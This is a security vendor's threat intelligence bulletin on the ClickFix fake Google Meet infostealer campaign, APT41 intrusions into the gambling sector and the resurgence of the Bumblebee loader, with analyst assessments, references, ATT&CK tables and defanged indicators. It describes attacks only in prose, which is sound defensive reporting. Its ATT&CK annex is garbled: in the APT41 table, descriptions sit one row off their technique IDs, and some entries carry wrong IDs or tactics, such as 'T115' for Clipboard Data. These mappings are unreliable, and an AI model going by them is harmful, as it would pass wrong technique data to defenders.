This report was processed and collated by the Elemendar CTI team and includes Mitre ATT&CK TTPS and IOCs collated from using one of our products; READ., an AI-driven Cybersecurity tool.
For further information or a demonstration of our products please visit our website: elemendar.ai You can download the report PDF below:
Contents
Executive Summary
Beware! Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
The ClickFix campaign, which began in May 2024, has become a sophisticated malware distribution operation, targeting Windows and macOS systems. It uses social engineering tactics such as fake Google Meet pages, phishing emails, and fake Facebook pages to trick users into downloading malware. Two groups, Slavic Nation Empire and Scamquerteo, are attributed to this campaign.
These threat actors exploit user naivety by making victims execute the malware, bypassing security tools. The stolen credentials are likely sold on Russian-speaking forums, and the campaign is expected to expand into mo
Chinese Nation-State Threat Actors, APT41 Hit Gambling Sector
Bumblebee malware returns after recent law enforcement disruption
Beware! Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
According to Cybersecurity company Sekoia, threat actors from two cybercriminal groups, Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo are responsible for the ongoing ClickFix malware campaign, which began in May 2024. The campaign utilises social engineering methods to target both Windows and macOS systems, using fake Google Meet web pages to deceive users into copying and executing malicious PowerShell code.
Elemendar CTI Analyst comment: The Slavic Nation Empire (SNE) and Scamquerteo are both part of larger organisations like MarkoPolo and CryptoLove who are engaged in targeting cryptocurrency users, Web3 applications, and decentralised finance (DeFi) platforms. The shared infrastructure and tactics suggest these groups are using a common cybercriminal service. SNE is known to operate within Russian-speaking cybercriminal forums. Comment Ends.
The ClickFix campaign has targeted multiple sectors through compromised websites and phishing. One notable attack from May to August 2024 targeted transport and logistics companies in North America by impersonating fleet management software. Additionally, a GitHub campaign aimed at developers spread Lumma Stealer by falsely reporting security vulnerabilities, affecting thousands of public code repositories. The attack works by displaying fake error messages in the victim's web browser, prompting them to run a PowerShell command to resolve the issue. The campaign has been seen impersonating well-known online services such as Google Meet, Facebook, Zoom, and Google Chrome. On Windows, it delivers info-stealing malware like StealC and Rhadamanthys, while macOS users are tricked into downloading a malicious disk image file that installs the Atomic stealer (aka AMOS).
Elemendar CTI Analyst comment: StealC, Rhadamanthys and AMOS are widely available on underground forums as part of a malware-as-a-service (MaaS) package, where prices range from $100-$1000 (USD) per month for StealC and Rhadamanthys, whilst AMOS can cost $1000-$3000 (USD) per month. Apart from the differing target OS, there is little difference in the infostealers capability. Comment Ends.
Fig. 1: Screenshots of fake web services pages (source: Sekoia)
Elemendar Intelligence Assessment: The threat actors responsible for this campaign have been agnostic in their victimology and preyed on the naivety of the user to infect their system. By relying on the victim to download and subsequently execute the malware, the threat actor can bypass security tools and is likely to reduce both the time to gain access to the network and the footprint left by the threat actor.
Both Rhadamanthys and StealC engage in credential dumping, targeting LSASS (Local Security Authority Subsystem Service) to steal credentials stored in memory. With these credentials, threat actors can escalate privileges and gain access to higher-level accounts, ensuring continued access to the network. Once the threat actors have elevated privileges, they can create backdoor accounts or modify existing accounts to maintain persistence. When persistence is gained, the threat actors can harvest credentials for as long as necessary. These credentials are then highly likely to be sold within Russian-speaking cybercriminal forums.
Given the believed success of the ClickFIx campaign, it is highly likely to endure and a rise in the number of victims from other verticals will be seen within the next six months. Assessment Ends.
Chinese Nation-State Hackers APT41 Hit Gambling Sector
A report released by Cybersecurity company Security Joes, APT41 (aka Brass Typhoon, Wicked Panda, and Winnti) was linked to a sophisticated and prolonged cyber attack targeting the gambling and gaming industry. The attack, which spanned nearly nine months during 2024, focused on gathering sensitive information such as network configurations, user passwords, and secrets from the LSASS process.
Elemendar CTI Analyst comment: APT41 is a Chinese nation-state sponsored cybercriminal group known for both espionage and financially motivated attacks across multiple geographical regions and industries. Their espionage efforts target industries like healthcare, telecommunications, and high-tech sectors, with a focus on intellectual property theft until 2015. APT41 also conducts surveillance, tracking individuals in sectors like higher education and media. Financially, they have previously targeted the video game industry, engaging in activities such as source code theft, virtual currency manipulation, and ransomware deployment. APT41 is also known for supply chain compromises, injecting malicious code into legitimate software updates. Comment Ends.
Fig. 2: Geographical locations and industries targeted by APT41 (Source: Mandiant)
During the intrusion, APT41 continuously updated their toolset to adapt to the victim's security defences. According to Security Joes, APT41 adjusted their tactics based on the defensive measures taken by the targeted organisation, ensuring their persistence and continued access to the compromised network.
The attack is associated with Operation Crimson Palace, a campaign tracked by Cybersecurity company Sophos, which shares many similarities with APT41's methods. While the exact initial access point is unclear, the attack is suspected to have been initiated through spear-phishing emails, as no evidence of active vulnerabilities or supply chain compromise was found. Once inside the network, the attackers executed a DCSync attack to steal password hashes from service and admin accounts, giving them access to high-privilege credentials.
In this campaign, APT41 used several advanced techniques, including Phantom DLL Hijacking and legitimate tools like wmic.exe, to evade detection. This use of common utilities helps them to mask their operation within normal system operations, further obfuscating detection.
One of the more sophisticated elements of this attack was the group's use of a custom command-and-control (C2) mechanism. After initially establishing contact with a hard-coded C2 server, the malware would update its C2 information by scraping GitHub users' profiles. This unique method involved parsing GitHub search results for specific patterns, creating an 8-character string that encoded the IP address of a new C2 server. This dynamic approach allowed APT41 to maintain control over the compromised systems even if the original C2 infrastructure was disrupted.
In the later stages of the attack, APT41 used heavily obfuscated JavaScript code hidden within a modified XSL file. This malicious script was executed through the legitimate wmic.exe tool to download additional payloads and gather system information. The malware specifically targeted devices within certain VPN subnets, filtering infected machines by their IP addresses to focus only on high-value targets.
Despite being detected and going silent for several weeks, APT41 returned with a new approach, demonstrating their persistence and adaptability.
Elemendar Intelligence Assessment: Given the previous victimology and the methodical, highly skilled approach to this attack, it is highly likely that APT41 are responsible for this ongoing campaign.
The continuous update of their toolset, custom C2 mechanism and obfuscation rules demonstrates an adaptive strategy which showcases APT41's ability to evolve in real time, making it challenging for cybersecurity teams to fully mitigate the threat.
APT41 presents an enduring threat to multiple verticals regardless of geographical location; this is highly unlikely to change. Attack frequency will depend on instruction from the state apparatus sponsoring their activity and is likely to fluctuate depending on geopolitical issues, such as sanctions or interest in advancing state-sponsored technological programmes. Assessment Ends.
Bumblebee malware returns after recent law enforcement disruption
According to researchers at cybersecurity company Netskope, The Bumblebee malware loader has resurfaced in recent attacks, more than four months after Europol disrupted its operations during Operation Endgame in May 2024. Bumblebee, which is believed to have been developed by the same group behind TrickBot, first emerged in 2022 as a replacement for BazarLoader, enabling ransomware actors to infiltrate networks. The malware is typically spread through phishing, malvertising, and SEO poisoning, where fake software like Zoom, Cisco AnyConnect, and Citrix Workspace is promoted to trick users into downloading malicious files.
Elemendar CTI Analyst comment: In May 2024, Operation Endgame, a coordinated law enforcement operation led by Europol, targeted the infrastructure supporting multiple malware loaders, including Bumblebee, IcedID, Pikabot, and TrickBot. Four arrests were made, 100 servers were seized and 2000 domains were placed under the control of law enforcement during this operation. One of the four suspects arrested is alleged to have earnt $74 million (USD) by renting out ransomware infrastructure. Comment Ends.
The latest Bumblebee attack chain starts with a phishing email that tricks victims into downloading a malicious ZIP archive. This archive contains a .LNK shortcut (named Report-41952.lnk), which, when clicked, triggers PowerShell to download and execute a fake NVIDIA driver update or Midjourney installer from a remote server. The file, a malicious MSI (Windows Installer), is executed silently using msiexec.exe with the /qn option, ensuring no user interaction is required during the malware's execution.
Elemendar CTI Analyst comment: Netskope did not provide specific details on the payloads deployed by Bumblebee in these latest attacks. Past variants of the malware have delivered Cobalt Strike beacons, information-stealing malware, and various ransomware strains. Comment Ends.
One of the key stealth techniques used by Bumblebee is to avoid spawning new processes, which would be noisier and more likely to trigger security alerts. Instead, it leverages the SelfReg table within the MSI structure, which allows msiexec.exe to load a DLL into its own address space, reducing its footprint and making it harder for security tools to detect.
Once executed, the Bumblebee malware is unpacked into memory, and its core payload is loaded. The payload includes Bumblebee’s signature internal DLL and uses RC4 encryption to decrypt its configuration. The latest samples of Bumblebee identified by Netskope use the "NEW_BLACK" string as the RC4 key for decryption, along with campaign IDs like "msi" and "lnk001" to track specific attacks.
Elemendar Intelligence Assessment: As seen with the LockBit takedown in February 2024, a drop in operational activity is highly likely to be seen following law enforcement operations, before a resurgence in this activity is observed. This is likely to be the case with Bumblebee.
It is likely that code for the malware was stored and sold to a new operator. Whilst all the details of the malwares payload have not been released, Bumblebee is highly likely to have been modified by this operator into a more potent malware strain.
Netskopes report includes details of how the malware has been modified to make it harder to detect by security solutions, have greater persistence and extract data more efficiently. Therefore, Bumblebee malware presents an ongoing threat to all verticals. Assessment Ends.
Annex A: References
Beware! Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.htm
https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/#h-victimology-of-clickfix-clusters
Chinese Nation-State Threat Actors, APT41 Hit Gambling Sector
https://rhisac.org/threat-intelligence/chinese-nation-state-hackers-apt41-attack-gambling-sector-for-financial-gain/
https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
https://cybersrcc.com/2024/10/22/chinese-nation-state-hackers-apt41-hit-gambling-sector-for-financial-gain/
Bumblebee malware returns after recent law enforcement disruption
https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-after-recent-law-enforcement-disruption/
https://www.darkreading.com/threat-intelligence/lockbit-ransomware-takedown-strikes-brand-viability
Annex B: STIX Entities
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Mitre ATT&CK TTPs
ID | Name | Tactic | Description |
T1567.004 | Exfiltration Over Webhook | Exfiltration | Adversaries may use a webhook to send data from a compromised network to an external location, effectively exfiltrating sensitive information. |
T1064 | Scripting | Execution | Adversaries may abuse scripting languages for execution, allowing them to automate the deployment and execution of payloads and commands on a system. |
T1587 | Malware | Resource Development | Adversaries may develop, purchase, or steal malware to be used in future campaigns to compromise and control victims' systems. |
T1562 | Impair Defences | Defence Evasion | Adversaries may impair security defences by disabling or modifying security controls to avoid detection and response. |
T1590.005 | IP Addresses | Reconnaissance | Adversaries may gather information about IP addresses related to their targets to prepare for exploitation or intrusion. |
T115 | Clipboard Data | Execution | Adversaries may capture clipboard data, potentially including sensitive information such as credentials or sensitive text. |
T1059.006 | Python | Execution | Adversaries may use Python scripts for execution of malicious payloads, leveraging its versatility and widespread use for command execution. |
T1027.010 | Command Obfuscation | Defence Evasion | Adversaries may use command obfuscation techniques, such as encoding or compression, to conceal malicious commands and avoid detection. |
T1059.005 | Visual Basic | Execution | Visual Basic can be used to execute arbitrary commands and scripts, enabling adversaries to leverage VB scripts for malicious purposes. |
T1036.009 | Break Process Trees | Defence Evasion | Adversaries may break process trees to hide the origin of malicious processes, making it harder to detect suspicious activity. |
T1608 | Stage Capabilities | Resource Development | Adversaries may stage capabilities such as malware or tools in preparation for future operations by uploading them to servers or cloud storage. |
T1583.001 | Domains | Resource Development | Adversaries may register domains to support malicious activities, including phishing, command-and-control, or delivery of payloads. |
T1569 | System Services | Execution | Adversaries may create or modify system services to execute malicious code during system boot or runtime. |
T1204 | User Execution | Execution | Adversaries rely on user execution, where a victim inadvertently executes malicious code, often via phishing or social engineering tactics. |
T1587.001 | Malware | Resource Development | Adversaries may develop or purchase malware as a part of their toolset to carry out their operations against targets. |
T1189 | Drive-by Compromise | Initial Access | Adversaries may exploit vulnerabilities in web browsers or plugins to gain initial access through a drive-by download without user interaction. |
T1590.002 | DNS | Reconnaissance | Adversaries may gather information on DNS records to understand target infrastructure and plan their attack. |
IOCs
Type | Value |
Domain Name | meet.google.us-join[.]com |
Domain Name | meet.googie.com-join[.]us |
Domain Name | meet.google.com-join[.]us |
Domain Name | meet.google.web-join[.]com |
Domain Name | meet.google.webjoining[.]com |
Domain Name | meet.google.cdm-join[.]us |
Domain Name | meet.google.us07host[.]com |
Domain Name | googiedrivers[.]com |
Domain Name | us01web-zoom[.]us |
Domain Name | us002webzoom[.]us |
Domain Name | web05-zoom[.]us |
Domain Name | webroom-zoom[.]us |
Domain Name | alienmanfc6[.]com |
Domain Name | apunanwu[.]com |
Domain Name | bowerchalke[.]com |
Domain Name | carolinejuskus[.]com |
Domain Name | cautrucanhtuan[.]com |
Domain Name | cphoops[.]com |
Domain Name | dekhke[.]com |
Domain Name | iloanshop[.]com |
Domain Name | kansaskollection[.]com |
Domain Name | lirelasuisse[.]com |
Domain Name | mdalies[.]com |
Domain Name | mensadvancega[.]com |
Domain Name | mishapagerealty[.]com |
Domain Name | modoodeul[.]com |
Domain Name | pabloarruda[.]com |
Domain Name | pakoyayinlari[.]com |
Domain Name | patrickcateman[.]com |
Domain Name | phperl[.]com |
Domain Name | stonance[.]com |
Domain Name | utv4fun[.]com |
URL | hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj |
URL | hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh |
URL | hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays |
URL | hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa |
SHA256: | a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c |
SHA256: | 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe |
SHA256: | 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 |
SHA256: | 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138 |
Chinese Nation-State Threat Actors, APT41 Hit Gambling Sector
Mitre ATT&CK TTPs
ID | Name | Tactic | Description |
T1584.008 | Network Devices | Resource Development | Adversaries may target domain controller authentication mechanisms to steal or forge authentication tickets to access network resources. |
T1556.001 | Domain Controller Authentication | Credential Access | Adversaries may target domain controller authentication mechanisms to steal or forge authentication tickets to access network resources. |
T1562 | Impair Defences | Defence Evasion | Adversaries may disable or manipulate security tools and defences, such as antivirus or firewalls, to avoid detection and facilitate malicious activities. |
T1098.005 | Device Registration | Persistence | Adversaries may manipulate device registrations, such as registering new devices to authenticated accounts, allowing continued access to cloud environments. |
T1078 | Valid Accounts | Persistence | Adversaries may exploit temporary elevated cloud access tokens to escalate privileges within cloud environments, gaining unauthorised control over resources. |
T1548.005 | Temporary Elevated Cloud Access | Privilege Escalation | Adversaries may manipulate accounts by creating, modifying, or disabling accounts to maintain persistence or facilitate lateral movement. |
T1098 | Account Manipulation | Persistence | Adversaries may search for unsecured credentials, such as plaintext passwords or API tokens, in files or system memory, to gain unauthorised access. |
T1552 | Unsecured Credentials | Credential Access | Adversaries may use phishing techniques to solicit information from victims, such as personal data or credentials, under the guise of legitimate communication. |
T1598 | Phishing for Information | Reconnaissance | Adversaries may compromise or create email accounts to support operations such as phishing, command-and-control, or exfiltration of sensitive information. |
T1586.002 | Phishing | Initial Access | Adversaries use phishing to deliver malicious links, attachments, or credentials to unsuspecting users, gaining initial access to the victim's environment. |
T1055.001 | Dynamic-link Library Injection | Defence Evasion | Adversaries may inject malicious code into processes using DLL injection, allowing them to evade detection and run their code in the context of another process. |
T1218.002 | Control Panel | Defence Evasion | Adversaries may use Control Panel items to execute malicious payloads or evade detection by leveraging this native Windows feature. |
T1574.002 | DLL Side-Loading | Defence Evasion | Adversaries may execute malicious code by side-loading a malicious DLL alongside a legitimate executable that loads the DLL during execution. |
IOCs
Type | Value |
C2 | time.qnapntp[.]com |
Fallback C2 | github[.]com/search?o=desc&q=pointers&s=joined&type=Users& |
Files | TSVIPSrv.dll |
URL | texttable.xsl |
Bumblebee malware returns after recent law enforcement disruptionMitre ATT&CK TTPs
ID | Name | Tactic | Description |
T1587.001 | Malware | Resource Development | Adversaries may develop, acquire, or modify malware to achieve their objectives during an operation, including initial access or privilege escalation. |
T1204 | User Execution | Execution | Adversaries rely on user execution of malicious files or links, often achieved through social engineering, to deliver and execute payloads in the target environment. |
T1546.009 | AppCert DLLs | Persistence | Adversaries may establish persistence by registering AppCert DLLs, which are loaded into processes, providing a way to execute code upon process execution. |
T1055.001 | Dynamic-link Library Injection | Defence Evasion | Adversaries may inject malicious code into processes by using DLL injection, enabling their code to run within another process context to evade detection. |
T1564.010 | Process Argument Spoofing | Defence Evasion | Adversaries may alter process arguments to spoof legitimate activity or hide malicious processes, allowing them to evade detection from monitoring tools. |
T1218.011 | Rundll32 | Defence Evasion | Adversaries may use Rundll32.exe to execute code, leveraging this legitimate Windows utility to bypass security controls and evade detection. |
T1480.001 | Environmental Keying | Defence Evasion | Adversaries may use environmental keying to protect malware from running in unintended environments by tying its execution to specific hardware or software configurations. |
IOCs
Type | Entity |
File | msiexec.exe |
Probability Language
This document uses probability language based on assessment. Further information can be found in the image below:
Feedback
We welcome your feedback, this ensures we meet your needs.
Please contact our CTI Director at : CTI@elemendar.ai
Acknowledgements
Authored by Paul Montgomery, CTI Director Elemendar
super insights thank you!!